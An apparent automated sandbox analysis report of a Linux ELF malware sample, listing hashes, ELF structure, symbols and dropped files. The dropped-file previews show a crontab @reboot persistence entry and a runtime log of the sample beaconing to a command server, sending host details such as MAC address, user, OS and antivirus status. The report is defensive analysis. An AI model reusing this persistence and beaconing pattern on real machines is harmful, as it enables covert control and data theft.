Preview:	.ELF..............>.......@.....@........<..........@.8...@.............@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@.....I.......I......... ..............!.......!h......!h....................... ..............-.......-h......-h.....................................T.......T.@.....T.@.....D.......D...............P.td....`i......`iF.....`iF......C.......C..............Q.td....................................................R.td.....!.......!h......!h..... ....... .............../lib64/ld-linux-x86-64.so.2.............GNU............. ...............GNU.tZN...3.c'L.?....ONa...................b... ...A0.. @...@...H.......GR.)c......H...$"`.......n1.. .PD...J...P..d.UH..A.P.....0.....*.U.......$.B........t!..%_S.'P.................................................................................................................................................................................................

/.Library/log.txt Download File
Process:	/.Library/SystemServices/updateSystem
File Type:	ASCII text
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	5.509911616246645
Encrypted:	false
SSDEEP:	24:xxv2ROSFXt9RQtLZDtyFROVvLREbYGXXt9RQtL9gVQXiEXt9RQtLPxlMmEXt9RQu:jwOSFXl43WROV2b3Xl4qVQXiEXl45lfq
MD5:	9B04DDDD678BB03D40121ABCADBB6AD6
SHA1:	1F5B14DFECF49551A6CD137BA9EA7040BF4797AE
SHA-256:	0B930B7ECFCB6CF831F47ABB37096DCF13B2D3643AA9DD71465AA5EDAD9AC733
SHA-512:	433793A0E2DEABDB9C8560F3F55C54B9B79C360BCBE19017417C8C273B045C07FBE765BDEAD56AE08F33E4831701081DC77B2B314B8F864C756CC332DF5D846F
Malicious:	false
Reputation:	low
Preview:	start main.currentFullPath.before addToStatup.after addToStatup.befor getUrlAvailable.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==.after getUrlAvailable.https://graphic-updater.com.befor token.serial=root_00:50:56:98:91:2c&name=root&os=Linux 5.4.0-72-generic x86_64&anti=av&ip=local 192.168.2.23&user_token=987217232.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"token":"fd3d92a9-4080-4c2a-a9e4-387b4d86daaf"}.after token.fd3d92a9-4080-4c2a-a9e4-387b4d86daaf.count .befor sendRequest.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"data":[]}.after sendRequest.{"data":[]}.count .befor sendRequest.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"data":[]}.after sendRequest.{"data":[]}.count .befor sendRequest.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"data":[]}.af

/var/spool/cron/crontabs/tmp.Lgobsf Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	223
Entropy (8bit):	5.181124938424174
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQ5pVc5ZSGMQ5UYLtCFt3HY+AyBEv:8QjHig8r2keHLUHY+ARv
MD5:	B6CA5711F1C273764C417136B481F046
SHA1:	23DEC054B17CF98D96B0C347D23014838635A9FA
SHA-256:	248944A66955AEF41E84E804B8B09595F630C5EE9B8D329959937C50D07E3875
SHA-512:	19D58A12EB932DF5B22C61DDC7B5DFDE1730ACC845785FCCE72303332880E4505663FACADF8AFE6286D6EDF252894ABA7B36E6CFC63902EBD8956C343050AF33
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Wed Jan 12 09:44:15 2022).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot (/.Library/SystemServices/updateSystem).

Static File Info

General
File type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=745a4ed6eef433ad63274cc43f1cf5ce84094f4e, not stripped
Entropy (8bit):	6.301392210249311
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	WifCphMYfb
File size:	869336
MD5:	c805649d6909bf1d7e220f144801044b
SHA1:	b21ba8da278b75e1cc515b6e2c84b91be6611800
SHA256:	d028e64bf4ec97dfd655ccd1157a5b96515d461a710231ac8a529d7bdb936ff3
SHA512:	139480cf9d8c1d9a6d5f2f67cc3d62cf4008439f1bcb00e8cbfdbf0d9b030ca3bc92d3ca340bb8c272bec5b64ca38dbf1bbb992147fb605dfda4cf6f72afe983
SSDEEP:	24576:/eUjd10O8iZVdjajDA0KNZmHEWujnQyQ:/erO8iZVdjajDA0KNZmHEWEQX
File Content Preview:	.ELF..............>.......@.....@........<..........@.8...@.............@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@.....I.......I......... ..............!.......!h....

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - Linux
ABI Version:	0
Entry Point Address:	0x40840c
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	9
Section Header Offset:	867352
Section Header Size:	64
Number of Section Headers:	31
Header String Table Index:	30

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.interp	PROGBITS	0x400238	0x238	0x1c	0x0	0x2	A	0	0	1
.note.ABI-tag	NOTE	0x400254	0x254	0x20	0x0	0x2	A	0	0	4
.note.gnu.build-id	NOTE	0x400274	0x274	0x24	0x0	0x2	A	0	0	4
.gnu.hash	GNU_HASH	0x400298	0x298	0x40c	0x0	0x2	A	5	0	8
.dynsym	DYNSYM	0x4006a8	0x6a8	0x1b90	0x18	0x2	A	6	1	8
.dynstr	STRTAB	0x402238	0x2238	0x1c36	0x0	0x2	A	0	0	1
.gnu.version	VERSYM	0x403e6e	0x3e6e	0x24c	0x2	0x2	A	5	0	2
.gnu.version_r	VERNEED	0x4040c0	0x40c0	0x100	0x0	0x2	A	6	3	8
.rela.dyn	RELA	0x4041c0	0x41c0	0x6f0	0x18	0x2	A	5	0	8
.rela.plt	RELA	0x4048b0	0x48b0	0xcd8	0x18	0x42	AI	5	24	8
.init	PROGBITS	0x405588	0x5588	0x1a	0x0	0x6	AX	0	0	4
.plt	PROGBITS	0x4055b0	0x55b0	0x8a0	0x10	0x6	AX	0	0	16
.text	PROGBITS	0x405e50	0x5e50	0x58db2	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x45ec04	0x5ec04	0x9	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x45ec20	0x5ec20	0x7d40	0x0	0x2	A	0	0	32
.eh_frame_hdr	PROGBITS	0x466960	0x66960	0x4304	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x46ac68	0x6ac68	0x13a68	0x0	0x2	A	0	0	8
.gcc_except_table	PROGBITS	0x47e6d0	0x7e6d0	0x3179	0x0	0x2	A	0	0	4
.init_array	INIT_ARRAY	0x6821e0	0x821e0	0x18	0x8	0x3	WA	0	0	8
.fini_array	FINI_ARRAY	0x6821f8	0x821f8	0x8	0x8	0x3	WA	0	0	8
.data.rel.ro	PROGBITS	0x682200	0x82200	0xb18	0x0	0x3	WA	0	0	32
.dynamic	DYNAMIC	0x682d18	0x82d18	0x210	0x10	0x3	WA	6	0	8
.got	PROGBITS	0x682f28	0x82f28	0xd8	0x8	0x3	WA	0	0	8
.got.plt	PROGBITS	0x683000	0x83000	0x460	0x8	0x3	WA	0	0	8
.data	PROGBITS	0x683460	0x83460	0x30	0x0	0x3	WA	0	0	8
.bss	NOBITS	0x6834a0	0x83490	0x2d0	0x0	0x3	WA	0	0	32
.comment	PROGBITS	0x0	0x83490	0x59	0x1	0x30	MS	0	0	1
.symtab	SYMTAB	0x0	0x834f0	0x11b50	0x18	0x0		29	356	8
.strtab	STRTAB	0x0	0x95040	0x3eab6	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0xd3af6	0x122	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
PHDR	0x40	0x400040	0x400040	0x1f8	0x1f8	1.8136	0x4	R	0x8
INTERP	0x238	0x400238	0x400238	0x1c	0x1c	3.9408	0x4	R	0x1	/lib64/ld-linux-x86-64.so.2	.interp
LOAD	0x0	0x400000	0x400000	0x81849	0x81849	3.6875	0x5	R E	0x200000		.interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame .gcc_except_table
LOAD	0x821e0	0x6821e0	0x6821e0	0x12b0	0x1590	1.6913	0x6	RW	0x200000		.init_array .fini_array .data.rel.ro .dynamic .got .got.plt .data .bss
DYNAMIC	0x82d18	0x682d18	0x682d18	0x210	0x210	1.2410	0x6	RW	0x8		.dynamic
NOTE	0x254	0x400254	0x400254	0x44	0x44	2.7174	0x4	R	0x4		.note.ABI-tag .note.gnu.build-id
GNU_EH_FRAME	0x66960	0x466960	0x466960	0x4304	0x4304	2.9447	0x4	R	0x4		.eh_frame_hdr
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x10
GNU_RELRO	0x821e0	0x6821e0	0x6821e0	0xe20	0xe20	1.3839	0x4	R	0x1		.init_array .fini_array .data.rel.ro .dynamic .got

Dynamic Tags

Type	Meta	Value	Tag
DT_NEEDED	sharedlib	libcurl.so.4	0x1
DT_NEEDED	sharedlib	libstdc++.so.6	0x1
DT_NEEDED	sharedlib	libm.so.6	0x1
DT_NEEDED	sharedlib	libgcc_s.so.1	0x1
DT_NEEDED	sharedlib	libc.so.6	0x1
DT_INIT	value	0x405588	0xc
DT_FINI	value	0x45ec04	0xd
DT_INIT_ARRAY	value	0x6821e0	0x19
DT_INIT_ARRAYSZ	bytes	24	0x1b
DT_FINI_ARRAY	value	0x6821f8	0x1a
DT_FINI_ARRAYSZ	bytes	8	0x1c
DT_GNU_HASH	value	0x400298	0x6ffffef5
DT_STRTAB	value	0x402238	0x5
DT_SYMTAB	value	0x4006a8	0x6
DT_STRSZ	bytes	7222	0xa
DT_SYMENT	bytes	24	0xb
DT_DEBUG	value	0x0	0x15
DT_PLTGOT	value	0x683000	0x3
DT_PLTRELSZ	bytes	3288	0x2
DT_PLTREL	pltrel	DT_RELA	0x14
DT_JMPREL	value	0x4048b0	0x17
DT_RELA	value	0x4041c0	0x7
DT_RELASZ	bytes	1776	0x8
DT_RELAENT	bytes	24	0x9
DT_VERNEED	value	0x4040c0	0x6ffffffe
DT_VERNEEDNUM	value	3	0x6fffffff
DT_VERSYM	value	0x403e6e	0x6ffffff0
DT_NULL	value	0x0	0x0

Symbols

Name	Version Info Name	Version Info File Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_ITM_RU1			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_ITM_RU8			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_ITM_addUserCommitAction			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_ITM_memcpyRnWt			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_ITM_memcpyRtWn			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_Unwind_Resume	GCC_3.0	libgcc_s.so.1	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZGTtdlPv			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_ZGTtnam			.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_ZNKSs11_M_disjunctEPKc			.dynsym	0x411b80	128	FUNC	<unknown>	DEFAULT	13
_ZNKSs13get_allocatorEv			.dynsym	0x410880	41	FUNC	<unknown>	DEFAULT	13
_ZNKSs15_M_check_lengthEmmPKc			.dynsym	0x411b20	96	FUNC	<unknown>	DEFAULT	13
_ZNKSs16find_last_not_ofEPKcm			.dynsym	0x40fc5a	57	FUNC	<unknown>	DEFAULT	13
_ZNKSs16find_last_not_ofEPKcmm			.dynsym	0x411ed8	165	FUNC	<unknown>	DEFAULT	13
_ZNKSs3endEv			.dynsym	0x4116aa	77	FUNC	<unknown>	DEFAULT	13
_ZNKSs4_Rep12_M_is_leakedEv			.dynsym	0x411c4a	23	FUNC	<unknown>	DEFAULT	13
_ZNKSs4_Rep12_M_is_sharedEv			.dynsym	0x411a1e	25	FUNC	<unknown>	DEFAULT	13
_ZNKSs4dataEv			.dynsym	0x40ee56	26	FUNC	<unknown>	DEFAULT	13
_ZNKSs4sizeEv			.dynsym	0x40f248	29	FUNC	<unknown>	DEFAULT	13
_ZNKSs5beginEv			.dynsym	0x40f266	53	FUNC	<unknown>	DEFAULT	13
_ZNKSs5c_strEv			.dynsym	0x40ec4a	26	FUNC	<unknown>	DEFAULT	13
_ZNKSs5emptyEv			.dynsym	0x40f392	32	FUNC	<unknown>	DEFAULT	13
_ZNKSs6_M_repEv			.dynsym	0x410862	30	FUNC	<unknown>	DEFAULT	13
_ZNKSs6lengthEv			.dynsym	0x40ee70	29	FUNC	<unknown>	DEFAULT	13
_ZNKSs6rbeginEv			.dynsym	0x40f320	52	FUNC	<unknown>	DEFAULT	13
_ZNKSs7_M_dataEv			.dynsym	0x4107fe	17	FUNC	<unknown>	DEFAULT	13
_ZNKSs7_M_iendEv			.dynsym	0x411cc2	77	FUNC	<unknown>	DEFAULT	13
_ZNKSs7compareEPKc			.dynsym	0x412202	144	FUNC	<unknown>	DEFAULT	13
_ZNKSs7compareERKSs			.dynsym	0x410328	164	FUNC	<unknown>	DEFAULT	13
_ZNKSs8_M_checkEmPKc			.dynsym	0x411dde	90	FUNC	<unknown>	DEFAULT	13
_ZNKSs8_M_limitEmm			.dynsym	0x4121b6	76	FUNC	<unknown>	DEFAULT	13
_ZNKSs8capacityEv			.dynsym	0x41099e	30	FUNC	<unknown>	DEFAULT	13
_ZNKSs8max_sizeEv			.dynsym	0x4148c0	20	FUNC	<unknown>	DEFAULT	13
_ZNKSs9_M_ibeginEv			.dynsym	0x411c8c	53	FUNC	<unknown>	DEFAULT	13
_ZNKSt12__basic_fileIcE7is_openEv	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNKSt13runtime_error4whatEv	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSaIcEC1ERKS_	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSaIcEC1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSaIcEC2ERKS_	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSaIcEC2Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSaIcED1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSaIcED2Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSbIwSt11char_traitsIwESaIwEE12_M_leak_hardEv			.dynsym	0x43f780	81	FUNC	<unknown>	DEFAULT	13
_ZNSbIwSt11char_traitsIwESaIwEE4_Rep20_S_empty_rep_storageE	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	OBJECT	<unknown>	DEFAULT	SHN_UNDEF
_ZNSbIwSt11char_traitsIwESaIwEE4_Rep9_S_createEmmRKS1_			.dynsym	0x43f4c0	150	FUNC	<unknown>	DEFAULT	13
_ZNSbIwSt11char_traitsIwESaIwEE6appendEmw			.dynsym	0x43fb10	185	FUNC	<unknown>	DEFAULT	13
_ZNSbIwSt11char_traitsIwESaIwEE6resizeEmw			.dynsym	0x43fbd0	69	FUNC	<unknown>	DEFAULT	13
_ZNSbIwSt11char_traitsIwESaIwEE7reserveEm			.dynsym	0x43f9e0	304	FUNC	<unknown>	DEFAULT	13
_ZNSbIwSt11char_traitsIwESaIwEE9_M_mutateEmmm			.dynsym	0x43f560	537	FUNC	<unknown>	DEFAULT	13
_ZNSo5flushEv	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSo5writeEPKcl	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSolsEPSt15basic_streambufIcSt11char_traitsIcEE	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSs10_S_compareEmm			.dynsym	0x412e5a	64	FUNC	<unknown>	DEFAULT	13
_ZNSs12_Alloc_hiderC1EPcRKSaIcE			.dynsym	0x410934	53	FUNC	<unknown>	DEFAULT	13
_ZNSs12_Alloc_hiderC2EPcRKSaIcE			.dynsym	0x410934	53	FUNC	<unknown>	DEFAULT	13
_ZNSs12_M_leak_hardEv			.dynsym	0x414740	124	FUNC	<unknown>	DEFAULT	13
_ZNSs12_S_constructIN9__gnu_cxx17__normal_iteratorIPcSsEEEES2_T_S4_RKSaIcESt20forward_iterator_tag			.dynsym	0x421b4a	331	FUNC	<unknown>	DEFAULT	13
_ZNSs12_S_constructIPKcEEPcT_S3_RKSaIcESt20forward_iterator_tag			.dynsym	0x4193fc	305	FUNC	<unknown>	DEFAULT	13
_ZNSs12_S_constructIPcEES0_T_S1_RKSaIcESt20forward_iterator_tag			.dynsym	0x41cb86	305	FUNC	<unknown>	DEFAULT	13
_ZNSs12_S_empty_repEv			.dynsym	0x4117c4	11	FUNC	<unknown>	DEFAULT	13
_ZNSs13_S_copy_charsEPcN9__gnu_cxx17__normal_iteratorIS_SsEES2_			.dynsym	0x4255a0	77	FUNC	<unknown>	DEFAULT	13
_ZNSs13_S_copy_charsEPcPKcS1_			.dynsym	0x41ccdf	53	FUNC	<unknown>	DEFAULT	13
_ZNSs13_S_copy_charsEPcS_S_			.dynsym	0x423f10	53	FUNC	<unknown>	DEFAULT	13
_ZNSs15_M_replace_safeEmmPKcm			.dynsym	0x41952e	107	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep10_M_destroyERKSaIcE			.dynsym	0x4134a0	89	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep10_M_disposeERKSaIcE			.dynsym	0x4108aa	93	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep10_M_refcopyEv			.dynsym	0x41486c	72	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep10_M_refdataEv			.dynsym	0x4117d0	18	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep11_S_terminalE			.dynsym	0x4659dd	1	OBJECT	<unknown>	DEFAULT	15
_ZNSs4_Rep12_S_empty_repEv			.dynsym	0x41348d	18	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep13_M_set_leakedEv			.dynsym	0x41b33e	22	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep15_M_set_sharableEv			.dynsym	0x411c62	22	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep20_S_empty_rep_storageE	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x6834a0	32	OBJECT	<unknown>	DEFAULT	26
_ZNSs4_Rep26_M_set_length_and_sharableEm			.dynsym	0x411a38	102	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep7_M_grabERKSaIcES2_			.dynsym	0x411a9e	102	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep8_M_cloneERKSaIcEm			.dynsym	0x41376c	175	FUNC	<unknown>	DEFAULT	13
_ZNSs4_Rep9_S_createEmmRKSaIcE			.dynsym	0x414a38	358	FUNC	<unknown>	DEFAULT	13
_ZNSs4swapERSs			.dynsym	0x40f88e	580	FUNC	<unknown>	DEFAULT	13
_ZNSs5clearEv			.dynsym	0x40f556	164	FUNC	<unknown>	DEFAULT	13
_ZNSs5eraseEmm			.dynsym	0x40fc94	105	FUNC	<unknown>	DEFAULT	13
_ZNSs6appendEPKc			.dynsym	0x41096a	52	FUNC	<unknown>	DEFAULT	13
_ZNSs6appendEPKcm			.dynsym	0x40f732	348	FUNC	<unknown>	DEFAULT	13
_ZNSs6appendERKSs			.dynsym	0x4109fe	256	FUNC	<unknown>	DEFAULT	13
_ZNSs6appendEmc			.dynsym	0x41463c	259	FUNC	<unknown>	DEFAULT	13
_ZNSs6assignEPKc			.dynsym	0x412e26	52	FUNC	<unknown>	DEFAULT	13
_ZNSs6assignEPKcm			.dynsym	0x41848c	322	FUNC	<unknown>	DEFAULT	13
_ZNSs6assignERKSs			.dynsym	0x41181e	258	FUNC	<unknown>	DEFAULT	13
_ZNSs6insertEmPKc			.dynsym	0x410afe	57	FUNC	<unknown>	DEFAULT	13
_ZNSs6insertEmPKcm			.dynsym	0x4135a8	451	FUNC	<unknown>	DEFAULT	13
_ZNSs6insertEmRKSs			.dynsym	0x4109bc	65	FUNC	<unknown>	DEFAULT	13
_ZNSs6insertEmRKSsmm			.dynsym	0x413528	128	FUNC	<unknown>	DEFAULT	13
_ZNSs6resizeEm			.dynsym	0x40f21c	43	FUNC	<unknown>	DEFAULT	13
_ZNSs6resizeEmc			.dynsym	0x4115c6	143	FUNC	<unknown>	DEFAULT	13
_ZNSs7_M_copyEPcPKcm			.dynsym	0x411c00	74	FUNC	<unknown>	DEFAULT	13
_ZNSs7_M_dataEPc			.dynsym	0x4117fe	32	FUNC	<unknown>	DEFAULT	13
_ZNSs7_M_leakEv			.dynsym	0x411674	54	FUNC	<unknown>	DEFAULT	13
_ZNSs7_M_moveEPcPKcm			.dynsym	0x414b9e	74	FUNC	<unknown>	DEFAULT	13
_ZNSs7reserveEm			.dynsym	0x410b38	293	FUNC	<unknown>	DEFAULT	13
_ZNSs9_M_assignEPcmc			.dynsym	0x41b2ef	78	FUNC	<unknown>	DEFAULT	13
_ZNSs9_M_mutateEmmm			.dynsym	0x411f7e	567	FUNC	<unknown>	DEFAULT	13
_ZNSs9push_backEc			.dynsym	0x411956	199	FUNC	<unknown>	DEFAULT	13
_ZNSsC1EOSs			.dynsym	0x40f49a	69	FUNC	<unknown>	DEFAULT	13
_ZNSsC1EPKcRKSaIcE			.dynsym	0x40f0fe	112	FUNC	<unknown>	DEFAULT	13
_ZNSsC1EPKcmRKSaIcE	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSsC1ERKSs			.dynsym	0x40f5fa	232	FUNC	<unknown>	DEFAULT	13
_ZNSsC1ERKSsmm			.dynsym	0x43b350	166	FUNC	<unknown>	DEFAULT	13
_ZNSsC1Ev			.dynsym	0x40f3f6	83	FUNC	<unknown>	DEFAULT	13
_ZNSsC1IN9__gnu_cxx17__normal_iteratorIPcSsEEEET_S4_RKSaIcE			.dynsym	0x411d10	81	FUNC	<unknown>	DEFAULT	13
_ZNSsC1IPKcEET_S2_RKSaIcE			.dynsym	0x41b406	81	FUNC	<unknown>	DEFAULT	13
_ZNSsC1IPcEET_S1_RKSaIcE			.dynsym	0x410810	81	FUNC	<unknown>	DEFAULT	13
_ZNSsC2EOSs			.dynsym	0x40f49a	69	FUNC	<unknown>	DEFAULT	13
_ZNSsC2EPKcRKSaIcE			.dynsym	0x40f0fe	112	FUNC	<unknown>	DEFAULT	13
_ZNSsC2ERKSs			.dynsym	0x40f5fa	232	FUNC	<unknown>	DEFAULT	13
_ZNSsC2ERKSsmm			.dynsym	0x43b350	166	FUNC	<unknown>	DEFAULT	13
_ZNSsC2Ev			.dynsym	0x40f3f6	83	FUNC	<unknown>	DEFAULT	13
_ZNSsC2IN9__gnu_cxx17__normal_iteratorIPcSsEEEET_S4_RKSaIcE			.dynsym	0x411d10	81	FUNC	<unknown>	DEFAULT	13
_ZNSsC2IPKcEET_S2_RKSaIcE			.dynsym	0x41b406	81	FUNC	<unknown>	DEFAULT	13
_ZNSsC2IPcEET_S1_RKSaIcE			.dynsym	0x410810	81	FUNC	<unknown>	DEFAULT	13
_ZNSsD1Ev			.dynsym	0x40edf8	94	FUNC	<unknown>	DEFAULT	13
_ZNSsD2Ev			.dynsym	0x40edf8	94	FUNC	<unknown>	DEFAULT	13
_ZNSsaSEOSs			.dynsym	0x40f6e2	41	FUNC	<unknown>	DEFAULT	13
_ZNSsaSEPKc			.dynsym	0x410302	37	FUNC	<unknown>	DEFAULT	13
_ZNSsaSERKSs			.dynsym	0x40f4e0	37	FUNC	<unknown>	DEFAULT	13
_ZNSsixEm			.dynsym	0x40f2ec	52	FUNC	<unknown>	DEFAULT	13
_ZNSspLEPKc			.dynsym	0x40f70c	37	FUNC	<unknown>	DEFAULT	13
_ZNSspLERKSs			.dynsym	0x40f530	37	FUNC	<unknown>	DEFAULT	13
_ZNSspLEc			.dynsym	0x40f506	41	FUNC	<unknown>	DEFAULT	13
_ZNSt11logic_errorD1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt11range_errorD1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt12__basic_fileIcE8sys_openEiSt13_Ios_Openmode	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt12__basic_fileIcED1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt12domain_errorD1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt12length_errorD1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt12out_of_rangeD1Ev	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt12system_errorD1Ev	GLIBCXX_3.4.11	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt12system_errorD2Ev	GLIBCXX_3.4.11	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt13basic_filebufIcSt11char_traitsIcEE27_M_allocate_internal_bufferEv	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt13basic_filebufIcSt11char_traitsIcEE4syncEv	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt13basic_filebufIcSt11char_traitsIcEE5closeEv	GLIBCXX_3.4	libstdc++.so.6	.dynsym	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_ZNSt13basic_fi

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report WifCphMYfb

Overview

General Information

Detection

Signatures

Classification

General Information

Process Tree

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Dynamic Tags

Symbols